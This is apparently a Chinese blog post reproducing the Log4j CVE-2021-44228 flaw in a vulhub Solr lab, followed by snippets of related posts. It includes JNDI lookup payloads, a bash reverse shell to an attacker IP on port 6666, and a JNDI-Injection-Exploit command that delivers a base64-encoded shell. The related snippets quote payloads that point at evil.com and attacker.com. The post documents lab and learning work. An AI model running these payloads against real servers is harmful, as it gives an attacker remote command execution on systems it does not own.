CVE-2021-44228漏洞log4j漏洞复现

已于 2024-11-18 15:10:31 修改
阅读量677 收藏 3
点赞数 10
文章标签: 网络安全 系统安全 web安全 log4j
于 2024-11-11 23:19:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/THZLYXX/article/details/143697180
版权

漏洞原理

      Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。

      在Log4j2中提供了Lookups机制,Lookups提供了一种在Log4j配置文件任意位置添加值的方法;而Lookups机制中,存在JNDI,在Log4j日志输出时,未对字符合法性进行严格的限制,造成JNDI协议加载的远程恶意脚本被执行,从而造成RCE。

一、环境搭建

1.vulhub靶场启动,进入目录/home/vulhub-master/log4j/CVE-2021-44228/

使用命令拉取启动靶场

docker-compose up -d

2.查看靶场启动端口

your ip:8983

3.浏览器访问your ip:8983

二、漏洞验证

1.打开DNSlog平台

2.利用payload进行验证

http://192.168.XX.XX:8983/solr/admin/cores?action=${jndi:ldap://XX.DNSlog地址.XX}

3.漏洞存在dnslog平台有了数据显示数据,说明存在此漏洞

三、漏洞利用

1.下载JNDI-Injection-Exploit-1.0-SNAPSHOT-all工具进行漏洞利用

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

2.对执行的命令进行加密bash64进行加密

bash -i >& /dev/tcp/攻击机IP/6666 0>&1

3.使用burp进行bash64编码

4.使用kali监听一个端口

5.使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all注入工具生成可用payload


java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}|{base64,-d}|{bash,-i}" -A 192.XXX.XXX.XXX

把工具放到需要执行的目录下我这里放到了/opt目录下

6.使用bp进行抓包,将工具生成的payload替换到语句中,并对其进行URL编码

${jndi:ldap://192.XXX.XXX.XXX:1389/ga1dj3}

7.发送数据包,回到kali查看已监听成功,并能执行命令

THZLYXX
关注
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 860
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
[CVE-2021-44228]:log4j2漏洞复现流程详解(vulhub环境)
weixin_45441024的博客
04-23 508
Apache Log4j2是Apache软件基金会下的一个开源的基于java的日志记录工具。该远程代码执行漏洞基于攻击者使用${}关键标识触发JNDI注入漏洞,可以执行任意代码。
Log4j 远程代码执行漏洞解析(CVE-2021-44228复现
zkaqlaoniao的博客
12-23 592
Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本,相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。log4j支持JNDI协议。Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。
CVE-2021-44228 Apache Log4j 远程代码执行漏洞 复现与分析
最新发布
徐徐徐的博客
02-20 1279
2021年12月10日,阿里云安全团队发现 Apache Log4j 2.15.0-rc1 版本存在漏洞绕过。2021年12月15日,Apache官方发布Log4j 2.16.0 以及 2.12.2 版本,修复CVE-2021-45046 Apache Log4j 拒绝服务与远程代码Apache Log4j2是一款优秀的Java日志框架。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞
CVE-2021-44228漏洞复现
m0_65764670的博客
05-29 2880
漏洞log4j2漏洞log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
【vulhub】Log4j2:CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 3529
【vulhub】Log4j2:CVE-2021-44228漏洞复现
Log4j 2 (CVE-2021-44228)漏洞复现
Pluto.的博客
11-21 627
Log4j 2 (CVE-2021-44228)漏洞复现
CVE-2021-44228——Log4j2-RCE漏洞复现
Li-D的博客
06-10 1882
Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6208
log4j 漏洞CVE-2021-44228 漏洞复现
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
weixin_45715461的博客
06-28 4149
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
复现apache log4j2(CVE-2021-44228)漏洞
AmeV_ll的博客
03-30 256
JNDI (Java Naming and Directory Interface) 是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。JNDI接口在初始化时,可以将RMI URL作为参数传入,而JNDI注入就出现在客户端的lookup()函数中,如果lookup()的参数可控就可能被攻击,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程
Log4j2漏洞复现CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
CVE-2021-44228 apache log4j2 远程代码执行漏洞复现
weixin_70045024的博客
09-03 386
CVE-2021-44228
Log4j-CVE-2021-44228漏洞复现
MrHatSec的博客
03-31 3278
Log4j-CVE-2021-44228漏洞复现
Log4j2—CVE-2021-44228漏洞复现
oiadkt的博客
04-10 571
Log4j2—CVE-2021-44228漏洞复现
log4j2-rce-cve-2021-44228 漏洞复现
weicanh的博客
04-29 299
log4j 2.15.0 开始,默认情况下已禁用此行为。从版本 2.16.0(以及 2.12.2、2.12.3 和 2.3.1)开始,此功能已被完全删除。
apache log4j 2(CVE-2021-44228)漏洞复现
net的博客
04-04 978
这个漏洞的根本原因在于log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。然而,我们没有对用户输入进行任何过滤或验证,这意味着如果用户输入包含恶意代码,它将会被记录到日志文件中。JNDI 的一种实现,允许按照具体的名称逻辑查找对象的位置,并输出对象的内容,此对象可以通过Java。协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j
Apache Log4j2远程代码执行漏洞CVE-2021-44228复现
qq_40640917的博客
01-10 2611
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
cve-2021-44228漏洞复现
03-16
cve-2021-44228漏洞是Apache Log4j 2.x中的一个严重漏洞,可以导致远程代码执行。要复现漏洞,需要使用恶意构造的日志消息来触发漏洞。 具体步骤如下: 1. 下载并安装Apache Log4j 2.x版本。 2. 创建一个Java程序,使用Log4j 2.x的API来记录日志。 3. 构造一个恶意的日志消息,其中包含一个特殊的字符序列,例如${jndi:ldap://attacker.com/Exploit}。 4. 将恶意的日志消息记录到日志中。 5. 启动应用程序并查看日志文件,如果存在漏洞,则会触发远程代码执行。 需要注意的是,该漏洞已经被广泛利用,因此建议尽快升级到最新版本的Apache Log4j 2.x,或者禁用Log4j 2.x的JNDI功能来缓解风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值